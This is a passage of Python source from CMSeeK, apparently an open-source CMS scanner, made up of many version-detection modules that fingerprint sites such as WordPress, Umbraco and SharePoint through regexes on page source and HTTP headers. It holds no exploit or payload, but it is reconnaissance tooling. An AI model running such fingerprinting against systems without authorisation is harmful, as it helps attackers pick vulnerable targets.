11 | def start(source): | |
12 | regex = re.findall(r'Powered by myUPB v(\d.*?)</a>', source) | |
13 | if regex != []: | |
14 | if regex[0] != '' and regex[0] != ' ': | |
15 | version = regex[0] | |
16 | cmseek.success('myUPB version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | ||
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # NodeBB version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(source): | |
12 | regex = re.search(r'var config(.*?)"version":"(\d.*?)"', source) | |
13 | if regex != None: | |
14 | try: | |
15 | version = regex.group(2) | |
16 | if version != "": | |
17 | cmseek.success('NodeBB version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
18 | return version | |
19 | except Exception as e: | |
20 | cmseek.error('lol detection failed!') | |
21 | return '0' | |
22 | cmseek.error('Version detection failed!') | |
23 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # OpenCms Version detection | |
6 | # Rev 1 | |
7 | import cmseekdb.basic as cmseek | |
8 | import re | |
9 | ||
10 | def start(url, ua): | |
11 | kurama = cmseek.getsource(url, ua) | |
12 | header = kurama[2].split('\n') | |
13 | regex = [] | |
14 | for tail in header: | |
15 | if 'Server' in tail and 'OpenCms' in tail: | |
16 | regex = re.findall(r'Server: OpenCms/(.*)', tail) | |
17 | if regex != []: | |
18 | cmseek.success('OpenCms version ' + cmseek.bold + cmseek.fgreen + regex[0] + cmseek.cln + ' detected') | |
19 | return regex[0] | |
20 | else: | |
21 | cmseek.error('Version detection failed!') | |
22 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Ophal version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content, url, ua): | |
12 | ga_content = ga_content.lower() | |
13 | regex = re.findall(r'ophal (.*?) \(ophal.org\)', ga_content) | |
14 | if regex != []: | |
15 | version = regex[0] | |
16 | cmseek.success('Ophal version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | else: | |
19 | kurama = cmseek.getsource(url, ua) # copypasta | |
20 | header = kurama[2].split('\n') | |
21 | regex = [] | |
22 | for tail in header: | |
23 | if 'x-powered-by' in tail: | |
24 | regex = re.findall(r'x-powered-by: Ophal (.*?) \(ophal.org\)', tail) | |
25 | if regex != []: | |
26 | cmseek.success('Ophal version ' + cmseek.bold + cmseek.fgreen + regex[0] + cmseek.cln + ' detected') | |
27 | return regex[0] | |
28 | else: | |
29 | cmseek.error('Version detection failed!') | |
30 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # OpenText WSM version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(source): | |
12 | source = source.lower() | |
13 | regex = re.findall(r'published by open text web solutions (.*?) -->', source) | |
14 | if regex != []: | |
15 | version = regex[0] | |
16 | if '-' in version: | |
17 | version = version.split('-') | |
18 | version = version[1].replace(' ', '') | |
19 | cmseek.success('OpenText WSM version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
20 | return version | |
21 | else: | |
22 | cmseek.error('Version detection failed!') | |
23 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # PunBB version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(source): | |
12 | regex = re.findall(r'PunBB</a> (\d.*?),', source) | |
13 | if regex != []: | |
14 | if regex[0] != '' and regex[0] != ' ': | |
15 | version = regex[0] | |
16 | cmseek.success('PunBB version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | ||
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # phpWind version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | ga_content = ga_content.lower() | |
13 | regex = re.findall(r'phpwind (.*)', ga_content) | |
14 | if regex != []: | |
15 | version = regex[0] | |
16 | cmseek.success('phpWind version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | else: | |
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Quick.Cart version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | cmseek.statement('Detecting Quick.Cart version using generator meta tag [Method 1 of 1]') | |
13 | regex = re.findall(r'Quick.Cart(.*?)v(.*)', ga_content) | |
14 | if regex != []: | |
15 | version = regex[0][1] | |
16 | cmseek.success('Quick.Cart version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | else: | |
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Quick.Cms version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | ga_content = ga_content.lower() | |
13 | regex = re.findall(r'quick.cms v(.*)', ga_content) | |
14 | if regex != []: | |
15 | version = regex[0] | |
16 | cmseek.success('Quick.Cms version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | else: | |
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # RBS Change version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | cmseek.statement('Detecting RBS Change version using generator meta tag [Method 1 of 1]') | |
13 | regex = re.findall(r'RBS Change (.*)', ga_content) | |
14 | if regex != []: | |
15 | version = regex[0] | |
16 | cmseek.success('RBS Change version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | else: | |
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # RiteCMS version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | ga_content = ga_content.lower() | |
13 | regex = re.findall(r'ritecms (.*)', ga_content) | |
14 | if regex != []: | |
15 | version = regex[0] | |
16 | cmseek.success('RiteCMS version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | else: | |
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Roadiz CMS version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | ga_content = ga_content.lower() | |
13 | regex = re.findall(r'roadiz (.*?) -', ga_content) | |
14 | if regex != []: | |
15 | version = regex[0] | |
16 | cmseek.success('Roadiz CMS version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | else: | |
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # RockRMS version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | ga_content = ga_content.lower() | |
13 | regex = re.findall(r'rock v(.*)', ga_content) | |
14 | if regex != []: | |
15 | version = regex[0] | |
16 | cmseek.success('Rock RMS version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | else: | |
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Sitefinity version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | ga_content = ga_content.lower() | |
13 | regex = re.findall(r'sitefinity (.*)', ga_content) | |
14 | if regex != []: | |
15 | version = regex[0] | |
16 | cmseek.success('Sitefinity version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | else: | |
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Microsoft SharePoint Version detection | |
6 | # Rev 1 | |
7 | import cmseekdb.basic as cmseek | |
8 | import re | |
9 | ||
10 | def start(url, ua): | |
11 | kurama = cmseek.getsource(url, ua) | |
12 | header = kurama[2].split('\n') | |
13 | regex = [] | |
14 | for tail in header: | |
15 | if 'MicrosoftSharePointTeamServices' in tail: | |
16 | regex = re.findall(r'MicrosoftSharePointTeamServices: (.*)', tail) | |
17 | if regex != []: | |
18 | cmseek.success('SharePoint version ' + cmseek.bold + cmseek.fgreen + regex[0] + cmseek.cln + ' detected') | |
19 | return regex[0] | |
20 | else: | |
21 | cmseek.error('Version detection failed!') | |
22 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # ShopFA version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content, header): | |
12 | cmseek.statement('Detecting ShopFA version using generator meta tag [Method 1 of 2]') | |
13 | regex = re.findall(r'ShopFA (.*)', ga_content) | |
14 | if regex != []: | |
15 | version = regex[0] | |
16 | cmseek.success('ShopFA version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | else: | |
19 | cmseek.statement('Detecting ShopFA version using HTTP Headers [Method 2 of 2]') | |
20 | headers = header.split('\n') | |
21 | regex = [] | |
22 | for h in headers: | |
23 | if 'X-Powered-By: ShopFA' in h: | |
24 | regex = re.findall(r'X-Powered-By: ShopFA (.*)', h) | |
25 | if regex != []: | |
26 | version = regex[0] | |
27 | cmseek.success('ShopFA version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
28 | return version | |
29 | else: | |
30 | cmseek.error('Version detection failed!') | |
31 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # SeamlessCMS version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(source): | |
12 | regex = re.findall(r'Published by Seamless.CMS.WebUI, (.*?) -->', source) | |
13 | if regex != []: | |
14 | version = regex[0] | |
15 | cmseek.success('SeamlessCMS version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
16 | return version | |
17 | else: | |
18 | cmseek.error('Version detection failed!') | |
19 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # SMF version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(source): | |
12 | regex = re.findall(r'SMF (\d.*?)</a>', source) | |
13 | if regex != []: | |
14 | if regex[0] != '' and regex[0] != ' ': | |
15 | version = regex[0] | |
16 | cmseek.success('SMF version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | ||
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # sNews version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content,source): | |
12 | regex = re.findall(r'sNews (.*)', ga_content) | |
13 | if regex != []: | |
14 | version = regex[0] | |
15 | cmseek.success('sNews version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
16 | return version | |
17 | else: | |
18 | regex = re.findall(r'sNews (.*?)"', source) | |
19 | if regex != []: | |
20 | version = regex[0] | |
21 | cmseek.success('sNews version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
22 | return version | |
23 | else: | |
24 | cmseek.error('Version detection failed!') | |
25 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Serendipity version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | regex = re.findall(r'Serendipity v.(.*)', ga_content) | |
13 | if regex != []: | |
14 | version = regex[0] | |
15 | cmseek.success('Serendipity version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
16 | return version | |
17 | else: | |
18 | cmseek.error('Version detection failed!') | |
19 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Subrion CMS version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | regex = re.findall(r'Subrion CMS (.*?) - ', ga_content) | |
13 | if regex != []: | |
14 | version = regex[0] | |
15 | cmseek.success('Subrion CMS version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
16 | return version | |
17 | else: | |
18 | cmseek.error('Version detection failed!') | |
19 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # SULU Version detection | |
6 | # Rev 1 | |
7 | import cmseekdb.basic as cmseek | |
8 | import re | |
9 | ||
10 | def start(url, ua): | |
11 | kurama = cmseek.getsource(url, ua) | |
12 | header = kurama[2].split('\n') | |
13 | regex = [] | |
14 | for tail in header: | |
15 | if 'x-generator' in tail: | |
16 | regex = re.findall(r'x-generator: Sulu/(.*)', tail) | |
17 | if regex != []: | |
18 | cmseek.success('SULU version ' + cmseek.bold + cmseek.fgreen + regex[0] + cmseek.cln + ' detected') | |
19 | return regex[0] | |
20 | else: | |
21 | cmseek.error('Version detection failed!') | |
22 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | ## TiddlyWiki version detection | |
6 | ## Rev 1 | |
7 | ||
8 | import re | |
9 | import cmseekdb.basic as cmseek | |
10 | ||
11 | def start(source): | |
12 | version = '0' | |
13 | if 'major:' in source and 'minor:' in source and 'revision:' in source: | |
14 | major = re.findall(r'major: (.*?),',source) | |
15 | minor = re.findall(r'minor: (.*?),',source) | |
16 | rev = re.findall(r'revision: (.*?),',source) | |
17 | if major != [] and minor != [] and rev != []: | |
18 | version = major[0] + '.' + minor[0] + '.' + rev[0] | |
19 | cmseek.success('TiddlyWiki version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected!') | |
20 | else: | |
21 | cmseek.warning('Version detection failed!') | |
22 | else: | |
23 | cmseek.warning('Version detection failed!') | |
24 | return version |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # UBB.threads version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(source, ga_content): | |
12 | regex = re.findall(r'UBB.threads (\d.*)', ga_content) | |
13 | if regex != []: | |
14 | if regex[0] != '' and regex[0] != ' ': | |
15 | version = regex[0].replace(' ', '') | |
16 | cmseek.success('UBB.threads version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | ||
19 | regex2 = re.search(r'Powered by UBB.threads(.*?)Forum Software (\d.*?)</a>', source) | |
20 | if regex2 != None: | |
21 | try: | |
22 | version = regex2.group(2) | |
23 | cmseek.success('UBB.threads version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
24 | return version | |
25 | except Exception as e: | |
26 | cmseek.error('Version detection failed!') | |
27 | return '0' | |
28 | ||
29 | cmseek.error('Version detection failed!') | |
30 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # uKnowva version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | regex = re.findall(r'uKnowva (\d.*)', ga_content) | |
13 | if regex != []: | |
14 | version = regex[0] | |
15 | cmseek.success('uKnowva version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
16 | return version | |
17 | else: | |
18 | cmseek.error('Version detection failed!') | |
19 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 Tuhinshubhra | |
4 | ||
5 | # Umbraco version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(headers, url, ua, temp_src=''): | |
12 | cmseek.statement('Detecting Umbraco using headers [Method 1 of 2]') | |
13 | header = headers.split('\n') | |
14 | regex = [] | |
15 | for tail in header: | |
16 | if 'x-umbraco-version:' in tail.lower(): | |
17 | regex = re.findall(r'X-Umbraco-Version: (.*)', tail, re.IGNORECASE) | |
18 | ||
19 | if regex != [] and regex[0] != "": | |
20 | # detection via headers successful | |
21 | cmseek.success('Umbraco version ' + cmseek.bold + cmseek.fgreen + regex[0] + cmseek.cln + ' detected') | |
22 | return regex[0] | |
23 | else: | |
24 | cmseek.statement('Detecting Umbraco using source code [Method 2 of 2]') | |
25 | if temp_src == '': | |
26 | # no additional source code sent so we have to get it | |
27 | temp_url = url + '/umbraco' | |
28 | temp_src = cmseek.getsource(temp_url, ua) | |
29 | if temp_src[0] == '1': | |
30 | temp_src = temp_src[1] | |
31 | else: | |
32 | cmseek.error('Version detection failed!') | |
33 | return '0' | |
34 | ||
35 | new_regex = re.findall('"version"\: "(.*?)"', temp_src) | |
36 | ||
37 | if new_regex != [] and new_regex[0] != "": | |
38 | # detection via headers successful | |
39 | cmseek.success('Umbraco version ' + cmseek.bold + cmseek.fgreen + new_regex[0] + cmseek.cln + ' detected') | |
40 | return new_regex[0] | |
41 | else: | |
42 | cmseek.error('Version detection failed!') | |
43 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # UMI.CMS Version detection | |
6 | # Rev 1 | |
7 | import cmseekdb.basic as cmseek | |
8 | import re | |
9 | ||
10 | def start(url, ua): | |
11 | kurama = cmseek.getsource(url, ua) # was listening to https://soundcloud.com/ahmed-a-zidan/naruto-sad-music no better came to mind | |
12 | header = kurama[2].split('\n') | |
13 | regex = [] | |
14 | for tail in header: | |
15 | if 'X-CMS-Version' in tail: | |
16 | regex = re.findall(r'X-CMS-Version: (.*)', tail) | |
17 | if regex != []: | |
18 | cmseek.success('UMI.CMS version ' + cmseek.bold + cmseek.fgreen + regex[0] + cmseek.cln + ' detected') | |
19 | return regex[0] | |
20 | else: | |
21 | cmseek.error('Version detection failed!') | |
22 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Vanilla version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(url, ua): | |
12 | kurama = cmseek.getsource(url, ua) | |
13 | header = kurama[2].split('\n') | |
14 | regex = [] | |
15 | for tail in header: | |
16 | if 'X-Garden-Version: Vanilla' in tail: | |
17 | regex = re.findall(r'X-Garden-Version: Vanilla (\d.*)', tail) | |
18 | if regex != []: | |
19 | cmseek.success('Vanilla version ' + cmseek.bold + cmseek.fgreen + regex[0] + cmseek.cln + ' detected') | |
20 | return regex[0] | |
21 | else: | |
22 | cmseek.error('Version detection failed!') | |
23 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # WebGUI version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | regex = re.findall(r'WebGUI (.*)', ga_content) | |
13 | if regex != []: | |
14 | ||
15 | if ')' in regex[0]: | |
16 | # This could be done by regex right? if you know how to do so proudly create an issue and show me the way ;) | |
17 | version = regex[0].replace(')','') | |
18 | else: | |
19 | version = regex[0] | |
20 | ||
21 | cmseek.success('WebGUI version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
22 | return version | |
23 | else: | |
24 | cmseek.error('Version detection failed!') | |
25 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | ## WordPress version detection | |
6 | ## Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(id, url, ua, ga, source): | |
12 | version = '0' | |
13 | cmseek.statement('Detecting Version and vulnerabilities') | |
14 | if ga == '1' or ga == '2' or ga == '3': ## something good was going to happen but my sleep messed it up TODO: will fix it later | |
15 | cmseek.statement('Generator Tag Available... Trying version detection using generator meta tag') | |
16 | rr = re.findall(r'<meta name=\"generator\" content=\"WordPress (.*?)\"', source) | |
17 | if rr != []: | |
18 | version = rr[0] | |
19 | cmseek.success(cmseek.bold + cmseek.fgreen + "Version Detected, WordPress Version %s" % version + cmseek.cln) | |
20 | else: | |
21 | cmseek.warning("Generator tag was a big failure.. looking up /feed/") | |
22 | fs = cmseek.getsource(url + '/feed/', ua) | |
23 | if fs[0] != '1': # Something messed up real bad | |
24 | cmseek.warning("Couldn't get feed source code, Error: %s" % fs[1]) | |
25 | else: | |
26 | fv = re.findall(r'<generator>https://wordpress.org/\?v=(.*?)</generator>', fs[1]) | |
27 | if fv != []: # Not empty good news xD | |
28 | version = fv[0] | |
29 | cmseek.success(cmseek.bold + cmseek.fgreen + "Version Detected, WordPress Version %s" % version + cmseek.cln) | |
30 | else: | |
31 | cmseek.warning("Well even feed was a failure... let's lookup wp-links-opml then") | |
32 | opmls = cmseek.getsource(url + '/wp-links-opml.php', ua) | |
33 | if opmls[0] != '1': # Something messed up real bad | |
34 | cmseek.warning("Couldn't get wp-links-links source code, Error: %s" % opmls[1]) | |
35 | else: | |
36 | fv = re.findall(r'generator=\"wordpress/(.*?)\"', opmls[1]) | |
37 | if fv != []: # Not empty good news xD || you can guess it's copied right? | |
38 | version = fv[0] | |
39 | cmseek.success(cmseek.bold + cmseek.fgreen + "Version Detected, WordPress Version %s" % version + cmseek.cln) | |
40 | else: | |
41 | ## new version detection methods will be added in the future updates | |
42 | cmseek.error("Couldn't Detect Version") #sorry master thingy removed... sounded kinda cheesy -_- | |
43 | version = '0' | |
44 | return version |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # XpressEngine version detection | |
6 | # Rev 1 | |
7 | import cmseekdb.basic as cmseek | |
8 | import re | |
9 | ||
10 | def start(ga_content): | |
11 | regex = re.findall(r'XpressEngine (.*)', ga_content) | |
12 | if regex != []: | |
13 | cmseek.success('XpressEngine version ' + cmseek.bold + cmseek.fgreen + regex[0] + cmseek.cln + ' detected') | |
14 | return regex[0] | |
15 | else: | |
16 | cmseek.error('Version detection failed!') | |
17 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # XMB version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(source): | |
12 | regex = re.findall(r'<!-- Powered by XMB (\d.*?) ', source) | |
13 | if regex != []: | |
14 | if regex[0] != '' and regex[0] != ' ': | |
15 | version = regex[0] | |
16 | cmseek.success('XMB version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | else: | |
19 | regex = re.findall(r'Powered by XMB (\d.*?) ', source) | |
20 | if regex != []: | |
21 | if regex[0] != '' and regex[0] != ' ': | |
22 | version = regex[0] | |
23 | cmseek.success('XMB version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
24 | return version | |
25 | ||
26 | cmseek.error('Version detection failed!') | |
27 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # YaBB version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(source): | |
12 | regex = re.search(r'Powered by(.*?)YaBB (\d.*?)( |</a>)', source, re.DOTALL) | |
13 | if regex != None: | |
14 | try: | |
15 | version = regex.group(2) | |
16 | cmseek.success('YaBB version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | except Exception as e: | |
19 | regex = re.findall(r'<!-- YaBB (\d.*?) ', source) | |
20 | if regex != []: | |
21 | if regex[0] != '' and regex[0] != ' ': | |
22 | version = regex[0] | |
23 | cmseek.success('YaBB version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
24 | return version | |
25 | else: | |
